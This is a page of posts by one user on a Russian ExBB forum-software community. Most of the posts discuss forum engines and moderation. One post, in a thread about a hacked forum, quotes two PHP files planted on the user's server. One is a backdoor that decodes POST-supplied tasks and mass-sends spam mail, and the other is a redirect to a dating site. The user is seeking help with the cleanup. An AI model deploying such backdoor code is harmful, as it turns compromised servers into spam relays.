ExBB Community ExBB Community
 Сайт проекта ExBB Общение объединяет!
Войдите на форум при помощиВойти через loginza
 Чат на форуме      Помощь      Поиск      Пользователи     BanList BanList

Страниц (55): В начало « ... 2 3 4 5 [6] 7 8 9 10 ... » В конец

> Найдено сообщений: 812
roma1 Отправлено: 23 сентября 2013 — 19:26 • Тема: Вопрос по конвертации • Форум: Обсуждаем

Ответов: 36
Просмотров: 26327
тему можно будет переместить в утиль если она не будет востребована. У меня вопрос к Электрону, в какой из мускулов именно Вы можете легко сконвертить движок? где то помню что Вы успешно перегоняли в некоторые мускулы, вот в какой из них Вы можете легко перегнать Exbb? с хорошим исходом дела конечно.
roma1 Отправлено: 23 сентября 2013 — 19:20 • Тема: Как создавший тему может отредактировать заголовок темы? • Форум: Общие вопросы

Ответов: 30
Просмотров: 19405
Gori пишет:
Вот нытик....
это хамство и оскорбуха.
(Добавление)
NordWest пишет:
В конце концов можно было бы действительно попробовать это реализовать, но сделать с ограничением по времени или до момента появления следующего поста
одуматься и подправить название темы скажем минут в пять было бы не плохо, тем более пауки так быстро не наскакивают.
roma1 Отправлено: 23 сентября 2013 — 18:39 • Тема: Как создавший тему может отредактировать заголовок темы? • Форум: Общие вопросы

Ответов: 30
Просмотров: 19405
Gori хватит тут тыкать, если охота остаться и получать здесь поддержку то обуздайте свои нравы и высказывайтесь тактично, хотя сомневаюсь что с таким подходом Вы здесь на долго. Для Вас рекомендую подыскать другие движки где пользователи имеют прав поболее, здесь такой возможности нет, хотя были бы вежливее может ребята и что придумали.
roma1 Отправлено: 15 сентября 2013 — 15:41 • Тема: Теперь тута, ну и для отметки кто пришел, и кто потерялся • Форум: О жизни

Ответов: 246
Просмотров: 139151
Axel пишет:
Нет, не нужно на меня смотреть как на врага народа и саркастически передергивать мои слова.
Боже упаси, я просто не вкурил вопрос Улыбка

преимущества в том что на бесплатных, слабых, дешевых серверах где мускулы постоянно глючат, перегружают память и сервер, при этом теряют связь с базой данных этот движок летает. Это важно начинающим и мало понимающим в движках и б.д. Просто с него расти некуда если вырос в полноценного админа и выросла статистика, начинаешь думать о совершенстве и мощности уровня серьёзных движков.
roma1 Отправлено: 15 сентября 2013 — 13:55 • Тема: Теперь тута, ну и для отметки кто пришел, и кто потерялся • Форум: О жизни

Ответов: 246
Просмотров: 139151
Axel пишет:
просто до сих пор глаза протираю от увиденного
чего именно? того что движок и поддержка какая никакая но существует? то тут ребята постарались ибо ещё достаточно форумов на этом двигле работает особенно на слабых и бесплатных хостах.
То что Юра кинул то мы уже толковали много раз, вот недавно он то же был, с парапсихологом на пару твердили что бы народ скидался на моды, сколь могли собрали, я ничего не дал ибо понимал что дело пахнет дерьмом и это пустые трёпы. Теперь ни Юры ни психолога не видать а ведь толку с тех модов за которые просили не малые бабки если их никто не поддерживает. Я знал что он кинет и будет кидать, ибо его цели деньги.
Я второй проект поставил на Mybb, там модов бесплатных немерено и никто бабла не требует, ставятся с админки в один клик.
roma1 Отправлено: 2 сентября 2013 — 07:40 • Тема: Взлом форума • Форум: Уязвимости

Ответов: 6
Просмотров: 6253
бекап есть с файлами и вижу что числа с 22 прошлого месяца где то через день создавались эти файлы по дате в архиве. Вчера был создан последний но вчера выкачал бекап и сменил пароль к фтп сегодня посмотрю не будет ли новых файлов.

хм. если бы кто влез через фтп, он мог снести всё и повредить форум, врятли стал подбрасывать левые файлы регулярно.
(Добавление)
Где то на форуме нашли дыру скорее всего.
roma1 Отправлено: 2 сентября 2013 — 06:46 • Тема: Взлом форума • Форум: Уязвимости

Ответов: 6
Просмотров: 6253
ну вот в этих 11 файлах только то что я скопировал выше и ничего более, только файлы с разными безсмысленными названиями, пять файлов с кодом выше и шесть с тем что ниже я скопировал. Файлы есть но в движке оставлять я побоялся. Права на папку с форумом 750 стоят, куда уже более строго?
1Bot пишет:
ну и через форум возможно так сделать при наличии определенных прав доступа.
об этом я не знаю даже как Огорчение
стукну к хостеру но боюсь они так с правами намутят что опять форум ляжет.
roma1 Отправлено: 1 сентября 2013 — 19:58 • Тема: Взлом форума • Форум: Уязвимости

Ответов: 6
Просмотров: 6253
пропал пользователь, я стал разбираться и полез по фтп в корень форума в папку с форумом, кроме файлов движка php я увидел штук 10 php файлов с безсмысленными названиями типа
Цитата:
wqrrpiw.php
с неким внутренним наполнением типа...
CODE:
<?php
if (isset($_POST['task']))
{

error_reporting(E_ALL);
ini_set('display_errors', TRUE);
ini_set('memory_limit', '512M');
set_time_limit(0);
ini_set('max_execution_time',0);
ini_set('set_time_limit',0);

$x = unserialize(base64_decode($_POST['task']));
if ($x==false) {exit();}


$send_from = base64_encode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);

foreach ($x as $arr)
{
echo $arr['to']."\r\n";

$arr['msg'] = str_replace('[send_from_url]',$send_from,$arr['msg']);

mail($arr['to'],$arr['subj'],$arr['msg'],"MIME-Version: 1.0\r\nContent-type: text/html; charset=windows-1251\r\n");
}
exit('SEND OK');
}


или...

CODE:
<?php

header('Location: http://datingvule.ru');

?>


кто подскажет как это понять? я то удалил эти файлы с папки с форумом, но кто знает нет ли их в подпапках, нет ли правок в истинных файлах движка Огорчение
я в полном смятении мягко сказать, пароль от фтп только у меня и может у хостера есть.
roma1 Отправлено: 30 августа 2013 — 10:07 • Тема: Размышлизмы о движке • Форум: О жизни

Ответов: 64
Просмотров: 32718
electron пишет:
хрень
таки да, но просто интересно всё задумано так сказать форум-сайт со встроенными модулями. Но не развивается к сож.
roma1 Отправлено: 28 августа 2013 — 18:26 • Тема: Давайте сделаем универсальный конвертер • Форум: Утилиты и конвертеры

Ответов: 8
Просмотров: 7808
variant0 пишет:
Я не программист
тогда это делать просто некому к сож.
roma1 Отправлено: 28 августа 2013 — 10:19 • Тема: Размышлизмы о движке • Форум: О жизни

Ответов: 64
Просмотров: 32718
Нашел как по мне один отличный скрипт с мускульных, Intellect Board версии 2.2++ вообще цены нет, хотя поддержка слабовата. После мытарств по mybb, smf, phpbb и блужданиями в их админках, интеллект боард мне более близок к Exbb. Буду скорее всего ставить на другой проект, там нужно что то мощнее.
roma1 Отправлено: 26 августа 2013 — 05:17 • Тема: Размышлизмы о движке • Форум: О жизни

Ответов: 64
Просмотров: 32718
ну именно много вот начинают с простоты, а ниша простых и понятных интерфейсов опустела после phpbb2 да и тот нужно ковырять самому ибо сборки весьма стрёмные. ExBB уже в финале имеет функционал вполне достаточен для работы сходу. Один минус что нет возможности роста на нём если дело всё таки возымеет успех. Хотя рекламу можно на него вешать и не мало плюс выдерживает среднее количество посетителей онлайн. Так что такой движок должен иметь право на существование.
roma1 Отправлено: 25 августа 2013 — 12:30 • Тема: Размышлизмы о движке • Форум: О жизни

Ответов: 64
Просмотров: 32718
делать пока нечего, хочу поведать о своих похождениях по разных движках современности как ньюба не имеющего познаний ни в строении баз данных ни в редактировании таблиц, ни в кодировках и ещё много чего мне знать не дано да и не в охоту много знать.

Что же делать если форум создать хочется но заморачиваться просто нет ни сил ни времени, ни желания?
Скажу что таких очень много которые имеют что сказать, имеют идеи но нет знаний, как парней так и девчонок. Выход как бы и есть, бесплатные хостинги с предустановленными движками, это то что уже настроено, корпеть над фтп не нужно, ковырять некие настройки прав доступа, конектить движок с базой, ну кто видел админ панель хостинга тот знает что там работы много. Бесплатные или условно бесплатные дают возможность избежать бессонных ночей, нервов, пачки выкуренных сигарет, побитых мышек ноутбуков и т.д.
Но если человек там создал форум то за лёгкость и бесплатнось он платит либо деньги пусть и не большие либо форум не его собственнось и нужно смирится с мыслями что если форум станет посещаем и заохотится его забрать и перенести на платный хост, то это почти не возможно. Такова плата за простоту и удобства.

Побродив по интернету можно найти хосты которые и бесплатны но дают возможность заливать скрипты, у многих есть автоустановщик скриптов но часто густо это бесплатные и устаревшие версии скриптов форумов без плюшек и российской локализации.
Вот тут то начинаются козни, обновить что то трудно, то база не доступна то падает, то не привязывается к движку, то кодировки разные то движок залить по фтп трудно.
Походив по хостам перепробовал разные силовые движки, с бесплатных разумеется, smf, mybb, phpbb вплоть до олимпуса, punbb. Скажу кратко, новичку даже установив движок разобрать его настройки мудрено весьма, многим не нужны группы, права на группы, много непонятных модулей и сложностей которые начинаешь ковырять и проклинаешь что начал. Во многих решениях нужно лезть в редактирование кода дабы разместить ту же рекламу. Я не говорю уже о том что чем дальше в лес тем гуще дебри и сложности которые многим не нужны. Нулёные движки хостеры вычисляют и удаляют а покупать двиг не зная развития проекта не охота, а попробовать охота.

Моё мнение что начинающему нужен и должен быть простой движок без базы данных с возможностями простого мускула уровня phpbb2 и не более который встанет для пробы даже на слабый, бесплатный хост с часто падающей базой, нам база не нужна. С простыми и интуитивно понятными настройками что бы поставил и забыл или забил, работай и апай по тихоньку не спеша.

Задолбавшись в настройках двигов и баз, снёс всё и все, поставил ExBB финал и запустил форум, одним файлом скачал бекап и залил без проблем, ничего не упало и не побилось.
Это по моему один выход, есть ещё несколько движков на файлах но они не имеют русского перевода, считаю что ExBB даже в том виде что есть должен быть и выручит многих. В простоте и интуитивной понятности его класс, думаю что он будет востребован ещё много лет. п.с. такие мысли и я знаю что спецы скажут,
Цитата:
а что делов то там, всё легко ставится
скажите это девчонке 18 лет которая умеет готовить и хочет делится этими знаниями на своём форуме но не знает что такое движок, база данных, phpMyAdmin и Редактор DNS Зоны. Я многое не знаю и знать не хочу ибо ExBB это не нужно вообще.
К стати на хостинжере часто и много жалоб на недоступность форумов из за падений базы, ExBB там себя чувствует два уже года по королевски, полёт нормальный и проблем нет в принципе, не это ли нужно ньюбу новичку?
roma1 Отправлено: 10 августа 2013 — 09:56 • Тема: Мод: Пинг в Google и Яндекс • Форум: Модификации и дополнения

Ответов: 87
Просмотров: 64899
wasp спасиб.
wasp пишет:
На большие и оригинальные

скажем большие это не с общения а скорее перпост статей, как к перепосту относятся пауки?
а интересно в спойлеры пауки смотрят?
roma1 Отправлено: 9 августа 2013 — 17:33 • Тема: Общие вопросы • Форум: Общие вопросы

Ответов: 146
Просмотров: 82126
archi-mobile пишет:
BON, по поводу форума поддержки я не понял)
может выпимши разбуянилсси Огорчение Стаканчик

Страниц (55): В начало « ... 2 3 4 5 [6] 7 8 9 10 ... » В конец

Яндекс.Метрика   

Powered by ExBB
ExBB FM 1.0 RC1 by TvoyWeb.ru
InvisionExBB Style converted by Markus®

[Script Execution time: 0.0611]     [ ]